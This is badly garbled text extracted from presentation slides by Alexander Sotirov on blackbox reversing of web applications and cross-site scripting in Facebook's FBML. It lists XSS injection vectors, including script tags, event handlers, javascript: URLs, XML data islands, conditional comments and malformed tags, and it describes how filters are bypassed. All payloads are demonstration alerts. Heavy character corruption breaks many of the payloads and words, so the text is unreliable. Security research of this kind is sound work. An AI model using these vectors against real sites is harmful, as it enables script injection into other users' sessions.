Académique Documents
Professionnel Documents
Culture Documents
Alexander Sotirov
alex@sotirov.net
Reversing eb apps
blackbox reversing
XSS in Facebook
-vervie
.art )
*ser generated content
and Web +.,
Web +.,
A.)s
/ashups
0ext
.laintext
1i"ited 30/1
Flash
Attacker generated content
Social netorking
Web"ail
Blogs
Broser bugs
Features that allo scripting
Script tags
<script src=!http://www.example.com/xss."s!>
;vent handler attributes
<body onload=!alert('XSS')!>
#SS
<p style=!bac#$ro%nd:%rl('"a&ascript:alert(')')!>
*R1s
<im$ src=!"a&ascript:alert('XSS')!>
.roprietar! extensions to 30/1
X/1 data islands %);&
<xml src=!http://www.example.com/xss.xml! id=!x!>
<span datasrc=!(x! data)ld=!c! data)ormatas=!html!>
4avaScript expressions in attribute %<S=&
<p id=!*+alert('XSS'),!>
#onditional co""ents %);&
<-../i) $te 01 23>
<script>alert('XSS')</script>
<-/endi)3..>
.arsing invalid 30/1
<<scr45ipt/src=http://xss.com/xss."s></script
#anonicaliAation
Whitelisting
String "atching filters
Re"ove all script tags8
s/<script>//$7
B!passes8
)nco"plete blacklists
30/1 E-/ parsers
<body onload=!alert(')!>
<script>alert(C)</script>
<p>Hello</p>
</body>
#anonicaliAation
F. Build a E-/ tree fro" the input strea"
Re"ote eb applications
FuAAing
dras attention
Blackbox reversing
hitespace regexp
/4x5E4t4r4n !'/3<
result diffing
Application "odules
0est "odules
application pages
FB/1
FB4S
sandboxed 4avaScript
FB/1 processing
broser apps.facebook.co" funapp.exa"ple.co"
30/1 FB/1
:;0 ?funapp?foo.ht"l :;0 ?foo.ht"l
FB/1 processing8
#anonicaliAed output
Blackbox reversing